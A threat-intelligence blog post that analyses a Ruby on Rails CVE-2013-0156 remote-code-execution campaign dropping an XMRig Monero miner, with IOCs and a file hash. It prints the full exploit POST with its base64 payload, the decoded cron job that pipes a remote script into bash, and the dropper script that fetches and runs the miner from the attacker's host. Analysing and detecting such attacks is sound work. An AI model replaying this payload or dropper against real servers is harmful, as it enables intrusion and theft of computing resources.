Ruby RCE pushing Monero Coinminer

Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.

The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET CURRENT_EVENTS Possible CVE-2013-0156 Ruby On Rails XML POST to Disallowed Type YAML"; flow:established,to_server; content:"POST"; http_method; content:"|0d 0a|Content-Type|3a 20|"; pcre:"/^(?:application\/(?:x-)?|text\/)xml/R"; content:" type="; http_client_body; nocase; fast_pattern; content:"yaml"; distance:0; nocase; http_client_body; pcre:"/<[^>]*\stype\s*=\s*([\x22\x27])yaml\1/Pi"; reference:url,!topic/rubyonrails-security/61bkgvnSGTQ; classtype:web-application-attack; sid:2016175; rev:3; metadata:created_at 2013_01_09, updated_at 2013_01_09;)

The attacker has been sending the following data through a POST request:

POST / HTTP/1.1..Host: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)..X-HTTP-Method-Override:get..Content-Type: application/xml..Content-Length: 604....<xAdwt type='yaml'>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection.'LtUgJyxM; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyB3Z2V0IC1WJiZlY2hvICIxICogKiAqICogd2dldCAtcSAtTyAtIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLTt3Z2V0IC1WfHxjdXJsIC1WfGVjaG8gIjEgKiAqICogKiBjdXJsIC1zIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLScpCg==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route. segments: []. requirements:. :MsLmhhug:. :FR: :MKqyF.</xAdwt>

The attacker sends a base64 encoded payload inside a POST request in the hope that the ruby interpreter configured on the server will execute it. By unpacking the payload we obtained the following code:

system('crontab -r; wget -V&&echo "1 * * * * wget -q -O - <a href=""></a> 2>/dev/null|bash >/dev/null 2>&1"|crontab -;wget -V||curl -V|echo "1 * * * * curl -s <a href=""></a> 2>/dev/null|bash >/dev/null 2>&1"|crontab -')

This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is executed once per hour (notice the number 1: it means every first minute of every hour) and it downloads the file robots.txt via wget. The file is piped through bash, so most probably it’s a text file containing a shell script. By manually downloading it we can confirm our hypothesis. This is the file content:

touch .test||cd /dev/shm||cd /tmp 2>/dev/null
>$MAIL&&chmod 000 $MAIL
rm .test 2>/dev/null
rm sshd* 2>/dev/null
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -O .sshd||curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -O .sshd.i686||curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault||./.sshd -o -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget <a href=""></a> -O /dev/null --user-agent "$(uname -p)"||curl <a href=""></a> --user-agent "$(uname -p)"
pgrep -f hashvault||./.sshd.i686 -o -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget <a href=""></a> -O /dev/null --user-agent "$(uname -a)"||curl <a href=""></a> --user-agent "$(uname -a)"<br />

The script checks if there is a a coinminer already in execution and, if not, it downloads the coinminer from http://internetresearch[.]is/sshd (or sshd.i686), launching it afterwards. We found the coinminer used is the linux version of XMRIG Cpu Miner http://internetresearch[.]is/sshd

IOC 80 GET http://internetresearch[.]is/robots.txt (Cronjob Bash script) 80 GET http://internetresearch[.]is/sshd (x86-64 XMRIG coinminer download) 80 GET http://internetresearch[.]is/sshd (i686 XMRIG coinminer download) 80 GET http://internetresearch[.]is/sshd (Sending system Info in User Agent) 

XMRIG Executable:
MD5:  761f5cfd0a3cddb48c73bc341a4d07a9
FileSize: 723080 bytes